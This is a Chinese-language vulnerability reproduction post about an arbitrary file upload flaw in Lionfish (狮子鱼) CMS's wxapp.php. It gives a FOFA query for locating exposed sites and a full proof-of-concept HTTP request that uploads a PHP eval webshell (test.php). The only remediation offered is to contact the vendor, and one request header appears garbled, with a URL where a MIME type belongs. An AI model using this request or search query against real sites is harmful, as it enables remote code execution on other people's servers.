【漏洞复现】狮子鱼CMS文件上传漏洞(wxapp.php)
- IT业界
- 2025-08-04 10:39:02

Nx01 产品简介
狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
Nx02 漏洞描述狮子鱼CMS wxapp.php文件存在任意文件上传漏洞,攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。
Nx03 产品主页fofa-query: body="/seller.php?s=/Public/login"
Nx04 漏洞复现POC:
POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs ------WebKitFormBoundary8UaANmWAgM4BqBSs Content-Disposition: form-data; name="upfile"; filename="test.php" Content-Type: http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif <?php @eval($_POST['test']);?> ------WebKitFormBoundary8UaANmWAgM4BqBSs-- Nx05 修复建议建议联系软件厂商进行处理。
【漏洞复现】狮子鱼CMS文件上传漏洞(wxapp.php)由讯客互联IT业界栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“【漏洞复现】狮子鱼CMS文件上传漏洞(wxapp.php)”
下一篇
Redis底层原理